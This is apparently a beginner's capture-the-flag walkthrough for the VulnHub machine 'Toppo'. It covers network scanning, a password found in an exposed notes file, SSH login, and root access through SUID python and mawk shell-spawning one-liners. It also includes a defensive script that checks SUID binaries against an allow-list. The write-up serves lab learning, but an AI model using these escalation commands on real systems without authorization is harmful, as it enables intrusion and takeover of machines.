Walkthrough – Toppo

Toppo is a boot2root aimed at beginners.  You can download it from vulnhub here.

Scanning

First step is to find our target’s IP address.  We’ll accomplish this via arp-scan.

arp-scan -l
[...snip...]
10.10.10.22 00:0c:29:54:8d:88 VMware, Inc.
[...snip...]

Our target is located at 10.10.10.22. The next step is to determine what ports are open, using nmap.

nmap -p 1-65535 -T4 -A -v 10.10.10.22
[...snip...]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind
[...snip...]

Port :22

OpenSSH 6.7p1 is running on port 22.  Our nmap scan also tells us that it is likely a Debian version.

Port :80

Apache httpd 2.4.10 is running on port 80.  Nmap states that it is likely a Debian build as well, again indicating that the target is likely a Debian box.

Vulnerability Analysis

SSH

A quick scan of searchsploit doesn’t return any exploits for our version of OpenSSH.  In theory, we could still try to brute force our way in, but without even knowing a username, this is unlikely to succeed.

HTTP

There don’t appear to be any useful exploits for our version of Apache, time to take a look at the website that is running.

It appears to be a Bootstrap CMS site.  This is my first time encountering them, and after a quick Google search, it doesn’t appear like there are any standard login portals like you might have with a WordPress site (wp-admin).  searchsploit didn’t yield anything either.  There’s also no robots.txt file!

Next step, nikto.

root@kali:~# nikto --host=http://10.10.10.22
[...snip...]
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
[...snip...]

/admin/ is indeed interesting.  It has directory indexing, meaning you can view all of the files located in that directory.  It contains one file titled notes.txt.

Opening that file yields a lovely little note to self, with what appears to be a password!

At this point I spent a lot of time searching again for some sort of login page for management of the website, but had no luck.  That’s when I remembered that SSH is accessible.  It couldn’t be that easy…

Exploitation

SSH Login

Taking a guess that if the user’s password is 12345ted123, then maybe his username is ted, I tried to log in via SSH.

root@kali:~# sshpass -p 12345ted123 ssh ted@10.10.10.22

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jul 23 14:26:06 2018 from 10.10.10.23
ted@Toppo:~$

Reconnaissance

Sudo

It’s been simple enough so far, maybe ted is able to execute commands with sudo?  Let’s check:

ted@Toppo:~$ sudo -l
-bash: sudo: command not found

So sudo isn’t even available… interesting.

SUID

The suid bit in Linux file permissions allows a user to execute a file as the owner of that file, rather than as themselves.  An example of this is the passwd command.  passwd modifies system files like /etc/passwd and /etc/shadow, which requires root privileges; that means that in order for a user to change their own password, they need to be able to execute passwd as root.  Sometimes files have the suid bit set that allow you to execute arbitrary commands, which makes them a great privilege escalation vector.  For this reason, let’s search for files with the SUID bit set and see if there’s anything interesting.

The command that we will use is below:

find / -perm +4000 -user root -type f -print 2>/dev/null

-perm +4000 matches files with the SUID bit set (newer versions of GNU find no longer accept the + form; use -perm -4000 or -perm /4000 there).  -user root only shows those owned by root; if we are trying to escalate our privileges, we aren’t currently interested in running commands as users other than root.  -type f will only return regular files, not directories.  -print (the default action) outputs the full path of each match.  And finally, 2>/dev/null redirects stderr to the bit bucket so we don’t have to see permission errors from folders we aren’t allowed to search.

The results are below:

/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd

There are two items that stand out: python and mawk.  Both of these are interpreters, for Python and awk code respectively, and an interpreter that runs with an effective uid of 0 can be asked to execute arbitrary commands as root.
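As an added example (not part of the original walkthrough), the same SUID search turned into a defender-side check: the SUID-root binaries found on a host are compared against an allow-list of the ones a stock install is expected to carry, and anything extra is reported.  Both lists below are constructed for this example; the sample input mirrors the find output above.

```shell
# Added example, not from the original walkthrough: compare the SUID-root
# binaries found on a host against an allow-list of the ones a stock install is
# expected to carry, and report anything extra (here: the two interpreters).
# Both lists below are constructed for this example.

# Newer GNU find no longer accepts '-perm +4000'; '-perm -4000' works everywhere.
list_suid_root() {
  find "${1:-/}" -perm -4000 -user root -type f -print 2>/dev/null
}

# Allow-list (constructed): SUID-root binaries expected on a Debian 8 base system.
BASELINE='/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd'

# Read paths on stdin and print every one that is not in the allow-list.
unexpected_suid() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then
      printf '%s\n' "$path"
    fi
  done
}

# Sample input (constructed): the walkthrough's find output, i.e. the baseline
# plus the two interpreters that were left SUID on Toppo.
SAMPLE_FOUND="$BASELINE
/usr/bin/python2.7
/usr/bin/mawk"

# On a live host:  list_suid_root / | unexpected_suid
printf '%s\n' "$SAMPLE_FOUND" | unexpected_suid
```

Run against the sample list, the only two lines it prints are /usr/bin/python2.7 and /usr/bin/mawk; the allow-list should be reviewed per distribution release rather than copied blindly.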

Vulnerability Analysis

Python

Python can execute linux commands in a number of ways.  My method of choice is via pty.spawn, as shown below:

import pty
pty.spawn("/bin/sh")

The above lines open a new sh shell.  To run that Python code from the terminal, taking advantage of the suid bit on /usr/bin/python2.7, we’d execute the following:

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")'

Mawk

I believe that there are a number of ways that mawk could execute Linux commands; the only one that I am familiar with is below:

mawk 'BEGIN {system("/bin/sh")}'

Exploitation

Both of the above two vulnerabilities should be usable to escalate to root privileges.  We’ll next test each of them.

Python

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# hostname
Toppo
# cat /root/flag.txt
[ASCII-art banner reading "Toppo"]

Congratulations ! there is your flag : 0wnedlab{p4[censored]}

#

Without monospace fonts, it doesn’t turn out well, but that is supposed to say Toppo…

Mawk

ted@Toppo:~$ mawk 'BEGIN {system("/bin/sh")}'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# hostname
Toppo
# cat /root/flag.txt
[ASCII-art banner reading "Toppo"]

Congratulations ! there is your flag : 0wnedlab{p4[censored]}

#

And there you have it, root!  And two different ways!  I recommend filing that suid search one-liner for future use, it can be extremely helpful if you’re stuck looking for priv esc vectors.
